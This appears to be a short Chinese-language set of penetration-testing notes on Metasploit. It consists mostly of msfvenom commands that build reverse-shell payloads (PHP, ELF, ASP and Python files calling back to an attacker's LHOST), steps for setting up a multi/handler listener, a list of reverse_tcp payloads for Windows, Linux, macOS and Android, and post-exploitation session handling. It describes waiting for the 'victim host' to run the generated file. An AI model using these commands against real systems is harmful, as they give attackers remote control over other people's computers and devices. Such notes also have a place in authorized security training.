msfvenom:
攻击机
msfvenom -l payloads 查看payload
可以生成独立的有效负载(例如 Meterpreter 的 Windows 可执行文件)或获取可用的原始格式(例如 python)。该msfvenom --list formats
命令可用于列出支持的输出格式
生成载荷:
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > reverse_shell.php //php
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > rev_shell.elf //linux
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > rev_shell.asp //asp
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > rev_shell.py //python
然后msfconsole要使用模块进行监听:
msf6 > use exploit/multi/handler
进行监听,并且要设置 lhost、lport 以及对应的payload(对应系统)

设置payload可根据目标的OS来选择,下面是gpt给出的payload:
- windows/meterpreter/reverse_tcp:用于攻击运行Windows操作系统的目标系统,使用反向TCP连接方式与Metasploit框架建立连接,并提供Meterpreter shell。
- linux/x86/meterpreter/reverse_tcp:用于攻击运行Linux操作系统的目标系统,使用反向TCP连接方式与Metasploit框架建立连接,并提供Meterpreter shell。
- osx/x86/shell_reverse_tcp:用于攻击运行macOS操作系统的目标系统,使用反向TCP连接方式与Metasploit框架建立连接,并提供shell访问权限。
- android/meterpreter/reverse_tcp:用于攻击运行Android操作系统的目标设备,使用反向TCP连接方式与Metasploit框架建立连接,并提供Meterpreter shell。
设置完毕后就可以 run
等待受害主机运行msfvenom生成的文件。
后期使用其他模块时,连续按ctrl z隐藏会话,选择要利用的模块,此时需要set session
通过 sessions查看当前会话数量以及会话id,然后set session,然后run即可